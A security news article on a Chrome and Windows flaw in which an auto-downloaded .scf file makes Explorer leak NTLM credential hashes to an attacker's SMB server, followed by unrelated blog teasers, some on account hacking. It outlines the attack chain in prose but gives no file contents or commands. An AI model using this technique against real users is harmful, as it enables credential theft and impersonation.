Google Chrome vulnerability allows hackers to steal people’s Windows login credentials and launch SMB (Server Message Block) relay attacks, according to security experts. The attack technique that can allow credential theft is a combination of two different techniques, one of which was borrowed from the Stuxnet campaign and the other from a technique demonstrated at a Black Hat conference by two security researchers.
The Google Chrome vulnerability was uncovered by DefenceCode security engineer Bosko Stankovic, who said in a blog that he found the flaw in a default configuration of Chrome running on Windows 10.
He added that this vulnerability poses a threat not just to privileged users such as administrators but also to regular users and organisations since it “it enables the attacker to impersonate members of the organisation”. Hackers can also “immediately reuse” stolen credentials and privileges gained to launch further attacks “on other users or gain access and control of IT resources”.
DefenceCode said it had not informed Google about the vulnerability. However, Google told Threatpost that it was aware of the issue and “taking necessary action.”
According to Stankovic, the attack is simple and involves victims being tricked into clicking on a malicious link, which triggers an automatic download a Windows Explorer Shell Command File or SCF file. The SCF file lies dormant until the victim opens the download directory folder, after which it attempts to exfiltrate data linked with a Windows icon located on the hacker’s server. This in turn provides the attacker with the victim’s username and hashed password.
Threatpost cited independent security researchers as having noted that this flaw is not exclusively tied to how Chrome deals SCF files, rather it also relates to how Windows handles SCF files.
“Organisations that allow remote access to services such as Microsoft Exchange (Outlook Anywhere) and use NTLM as authentication method, may be vulnerable to SMB relay attacks, allowing the attacker to impersonate the victim, accessing data and systems without having to crack the password,” Stankovic warned.
.SCF file + SMB Protocol + Google Chrome
One such file type is Windows Explorer Shell Command File (.scf files). It supports some Windows Explorer commands like showing desktop or opening a Windows Explorer window. A .scf file, if stored on disk, retrieves an icon file when it’s loaded in a Windows Explorer window.
Serbian security researcher Bosko Stankovic of DefenseCode combined these two concepts of SMB protocol and .scf file to devise a new type of hacking attack.
A .scf file can be used to trick Windows into authenticating a remote SMB server. This is how the contents of file will look like:
After a user downloads the file on system, it’s triggered as soon as download folder is opened to view the file. Please note that one doesn’t need to click/open this file; Windows File Explorer automatically attempts to load the icon.
The rest of the work is done by the remote SMB server which is set up by some notorious force. The server is ready to capture user’s username and NTLMv2 password hash, which can be cracked offline. The server can also be configured to relay this connection to some external service that needs such credentials.
The bone is believed to be from a Harlan's ground sloth. Pic: LA Brea Tar Pits Workmen digging a new train line had an "amazing...
Hackers use various methods for hacking a facebook account password of victim. Today I tell you what type of methods hackers are using for h...
A programming language is a formal computer language or constructed language designed to communicate instructions to a machine, particularly...
Looking for best best hacking books? We have short listed some of the highly recommended books for beginners and advanced hackers. The ethic...
Onion Deep Web: Want some top 31 list of onion deep websites, but one question arise what kind of top 31 lists you want of hidden web, wh...
To become a hacker is difficult it is not easy as becoming a programmer even to perform a simplest hack you need to have knowledge in the C,...
An artist's impression of the Chenanisaurus barbaricus Scientists have discovered one of the last dinosaurs living in Africa bef...
Hacking is one of the hottest jobs in this decade but don’t take it as an easy job. You must have a deep knowledge of computer systems, prog...
The Joint Admissions and Matriculation Board (JAMB), yesterday began the conduct of the 2017 Unified Tertiary Matriculation Examination ...
Network Spoofer lets you change websites on other people’s phones and computers from your Android phone. You can use network Spoofer to: ...